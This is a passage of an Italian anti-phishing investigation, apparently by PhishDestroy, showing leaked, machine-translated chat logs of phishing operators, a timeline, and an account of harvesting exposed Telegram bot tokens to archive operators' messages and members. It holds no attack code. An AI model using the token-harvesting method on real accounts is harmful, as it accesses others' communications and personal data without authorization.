Anche se hai effettuato l'accesso al sito di phishing un paio di volte dal tuo IP, ormai non va più bene.Anche se sono già entrato un paio di volte su Fish dal mio IP, ormai non è più divertente
ME
MONETTI ESCOBAR25-03-2026 13:13:37
Al gruppoAl gruppo
ME
MONETTI ESCOBAR25-03-2026 13:13:38
XzNon so
D
Devoys25-03-2026 13:13:39
quando si utilizza l'interpolazionequando all'Interpol
D
Devoys25-03-2026 13:13:41
a cuia quale
ME
MONETTI ESCOBAR25-03-2026 13:13:44
Questo quiQuesta
B
Bonya25-03-2026 13:13:46
Sono venuto qui solo per fare due chiacchiereEntra qui nella chat
B
Bonya25-03-2026 13:13:49
Ha scritto cheHa scritto:
ME
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Bonya25-03-2026 13:13:57
Ciao, basta andare a salvare i tuoi dati, aspetta un minuto
ME
MONETTI ESCOBAR25-03-2026 13:14:11
[Foto condivisa]
D
Devoys25-03-2026 13:14:31
Li ho già visti in passato.Ne ho già visti di simili
B
Bonya25-03-2026 13:14:44
Beh, ci hanno beccati anche con il bot ukr.Beh, ci hanno anche dato addosso con il bot ucraino
B
Bonya25-03-2026 13:14:55
Non hai scritto nulla nella chat.Non hanno scritto nulla nella chat
B
Bonya25-03-2026 13:14:57
Non l'hai scritto tu?Ma no, l'avevano scritto
ME
MONETTI ESCOBAR25-03-2026 13:15:04
Non me ne frega un cazzo.E chi se ne frega
B
Bonya25-03-2026 13:15:06
A nome del canaleA nome del canale
D
Devoys25-03-2026 13:15:23
Lascia perdere, cazzo.Ma vaffanculo!
ME
MONETTI ESCOBAR25-03-2026 13:15:31
Sto smantellando questo gruppoElimino questo gruppo
B
Bonya25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
— Gruppo eliminato dal proprietario —

Il gruppo è stato cancellato nel giro di pochi minuti. Il messaggio di commiato di Bonya — "+" — e la conferma di Devoys con "sì" la dicono lunga: Sapevano di essere stati scoperti, e l'unica mossa che potevano fare era distruggere le prove. Ma a quel punto i dati erano già stati raccolti.

Da notare il commento rivelatore di Bonya: "Abbiamo subito un attacco anche al bot ucraino" — confermando che entrambi i progetti (quello ucraino e quello indonesiano) condividono lo stesso team operativo e che non era la prima volta che la loro infrastruttura veniva compromessa.

Sezione 8: Cosa dimostra tutto ciò

Come funziona PhishDestroy

Ogni dominio che compare su phishdestroy.io passa attraverso questa pipeline automatizzata. dopomogvoina[.]sbs non ha fatto eccezione.

Rilevamento
Analisi statica
Mappatura delle infrastrutture
Alla scoperta delle origini
OSINT
Generazione di report

Cronologia delle indagini

20 marzo 2026
Dominio dopomogvoina[.]sbs registrato tramite NiceNIC International
21 marzo 2026
Rilevato dalla pipeline di monitoraggio automatizzato di PhishDestroy
21 marzo 2026
Analisi completamente automatizzata completata: infrastruttura mappata, bundle JS deoffuscato, protocollo WebSocket documentato
22 marzo 2026
Identificato l'indirizzo IP di origine. Scoperto un secondo progetto di phishing (“HealthCare ID”) sullo stesso server
22 marzo 2026
All'aperto config.json consente l'identificazione dell'operatore tramite l'API di Telegram Bot
23 marzo 2026
Segnalazioni di abusi inviate al provider di hosting, a Cloudflare e ai CERT competenti
25 marzo 2026
Articolo pubblicato. I rapporti sui domini sono disponibili su PhishDestroy

Come è stato possibile: la rete di intelligenza artificiale dei bot di PhishDestroy

La presente indagine è stata condotta interamente da sistemi automatizzati. La pipeline di PhishDestroy non si limita a individuare i domini di phishing, ma si infiltra nell'infrastruttura degli operatori che li gestiscono.

2,000+
Bot di Telegram raccolti
Attivo
Alcuni bot sono ancora sotto monitoraggio
Dal 2024
Collezione Running

Quando i kit di phishing rendono pubblici i token dei bot di Telegram — come è successo in questo caso tramite config.json — il nostro sistema li raccoglie automaticamente, mappa i gruppi di operatori, estrae gli elenchi dei membri e archivia la cronologia dei messaggi. Oltre 2.000 bot sono stati raccolti in questo modo dal 2024. Alcuni sono ancora attivi, e ci divertiamo a osservare i criminali all’opera in tempo reale — perché il finale è già scritto.

Anche gli operatori che cancellano i propri account o eliminano i propri gruppi non riescono a fare in tempo. Quando si fanno prendere dal panico, noi abbiamo già tutto: archivi dei messaggi, dati dei profili, appartenenza ai gruppi, bot collegati. L'eliminazione non cambia nulla. I dati esistevano, e ora sono presenti nel nostro database.

"Aspettami" — Edizione "Truffatore"

Questo caso non è un caso isolato: è un esempio lampante di negligenza sistematica da parte di NiceNIC che abbiamo deciso di citare come esempio di “mega hacker”. Come ha giustamente sottolineato “Типичный Мошенник”: c’è una differenza tra hacker e truffatori — intelligenza. Questi operatori non sono né hacker né persone intelligenti.

I sistemi di PhishDestroy raccolgono automaticamente prove come questa su migliaia di domini: individuano i bot, archiviano le comunicazioni degli operatori e mappano l’infrastruttura. Questo caso specifico era semplicemente troppo assurdo per non essere reso pubblico. Il kit di phishing è di livello base, l’OPSEC è inesistente e gli operatori hanno cancellato in preda al panico il proprio gruppo pochi minuti dopo la scoperta.

Stiamo realizzando un sistema che mostrerà identità degli operatori verificate direttamente nelle pagine dei report sui domini — da truffatore a vittima, proprio come nel programma televisivo russo “Жди Меня” (Aspettami), ma al contrario. È attivo in modalità chiusa dal 2024. Molti operatori sono già stati identificati, compresi quelli che hanno cancellato i propri account. Stiamo solo decidendo il più interessante un modo per presentarlo. Restate sintonizzati.

Domini correlati

La nostra analisi ha individuato un secondo ambito — hlpforvpeople[.]sbs — registrati tramite lo stesso registrar con modelli di infrastruttura corrispondenti. Entrambi i domini sono presenti nel nostro database:

Inadempienza del registrar: NiceNIC International

NiceNIC International Group Co., Limited (Hong Kong) ha ricevuto numerose segnalazioni dettagliate di abusi da PhishDestroy riguardo a entrambi dopomogvoina[.]sbs e hlpforvpeople[.]sbs. Al momento della pubblicazione — 5 giorni dopo la prima segnalazione — Non è stata intrapresa alcuna azione. Entrambi i domini rimangono pienamente operativi.

Non si tratta di un caso isolato. Il fenomeno NiceNIC è un problema ricorrente nelle nostre indagini. L'indirizzo di contatto per segnalare gli abusi del registrar (abuse@nicenic.net) continua a non dare seguito alle segnalazioni di phishing corredate da prove concrete. Pur essendo un registrar accreditato dall’ICANN e vincolato dal Registrar Accreditation Agreement (RAA §3.18), NiceNIC opera in apparente impunità.

NiceNIC è presente in lingua russa e vende .ru domini a prezzi elevati (~200 $) e comunica con i clienti tramite VK e Telegram, piattaforme molto diffuse tra il pubblico di lingua russa. Il fatto che la sua clientela si sovrapponga a quella delle comunità clandestine solleva seri interrogativi sul fatto che la mancata risposta del registrar alle segnalazioni di abusi sia da attribuire a negligenza o a una strategia commerciale deliberata.

Questa indagine è stata pubblicata in parte a causa della prolungata inazione di NiceNIC. Quando i registrar si rifiutano di intervenire in caso di abusi legati al phishing, la denuncia pubblica diventa l’unico meccanismo di responsabilità rimasto.

Punti chiave

  • L'automazione è l'unico modo per stare al passo con i tempi. I kit di phishing vengono distribuiti e resi operativi nel giro di poche ore. La verifica manuale non riesce a tenere il passo.
  • Gli operatori commettono errori. Un file di configurazione lasciato accessibile in un progetto secondario ha portato alla luce un'intera operazione di phishing su scala multinazionale. È difficile garantire una sicurezza operativa (OPSEC) perfetta in ogni singolo progetto.
  • L'ingegneria sociale si evolve di pari passo con l'attualità. La guerra, gli aiuti umanitari e i programmi governativi vengono sempre più spesso sfruttati come esche per il phishing, poiché prendono di mira persone in difficoltà che sono meno propense a mettere in discussione la legittimità di tali iniziative.
  • Il riutilizzo delle infrastrutture è la norma. Un server, due progetti di phishing, due paesi, gli stessi operatori. Mappare le connessioni dell’infrastruttura rivela molto di più rispetto all’analisi isolata di un singolo dominio.

Ricerche correlate

Ulteriori analisi provenienti dalla pipeline di intelligence automatizzata di PhishDestroy

Il pannello di TrustWallet è stato compromesso
Una violazione del pannello di amministrazione ha portato alla luce un'operazione di phishing nel settore delle criptovalute che coinvolgeva diversi paesi, con la divulgazione dei log delle chat degli operatori.
Svelate le reti di "crypto drainer"
Analisi dell'infrastruttura alla base dei kit di phishing che svuotano i portafogli degli utenti DeFi.
NiceNIC: un registrar che favorisce la criminalità informatica
Come un registrar accreditato dall’ICANN ignori sistematicamente le segnalazioni di abusi — anche nel caso della presente indagine.
XMRWallet smascherato: 10 anni di chiavi rubate
Una truffa relativa ai portafogli Monero, durata un decennio, è stata smascherata grazie all’analisi JavaScript e all’analisi forense dei domini.
Svelata l'infrastruttura di una truffa
Hosting condiviso, operatori condivisi: come le reti di phishing riutilizzano le infrastrutture da una campagna all’altra.
BuyTRX Drainer: la verità svelata
Truffa energetica basata su TRON che prosciuga i portafogli tramite approvazioni di smart contract dannosi.

Dichiarazione di non responsabilità: Questa indagine è stata condotta interamente tramite ricognizione passiva e API pubbliche. Non è stato effettuato alcun accesso non autorizzato a nessun sistema. Le chiamate all’API del bot di Telegram hanno utilizzato un token reso pubblico dagli operatori in un endpoint non autenticato. Tutti i nomi di dominio citati in questo articolo sono stati resi irriconoscibili secondo la convenzione standard di sicurezza informatica.

Condividi questa indagine

X / Twitter Telegram Reddit LinkedIn

Indagini correlate

Anatomia del phishing nel mondo delle criptovalute: analisi inversa di 8 veri e propri programmi per il furto di frasi seed
INDAGINE APPROFONDITA
Anatomia del phishing nel mondo delle criptovalute: analisi inversa di 8 veri e propri programmi per il furto di frasi seed
Truffatori smascherati: analisi approfondita di 4 sistemi di gestione delle truffe
INDAGINE
Truffatori smascherati: analisi approfondita di 4 sistemi di gestione delle truffe
$0 Takedowns: How We Disrupt Phishing Infrastructure
INDAGINE
$0 Takedowns: How We Disrupt Phishing Infrastructure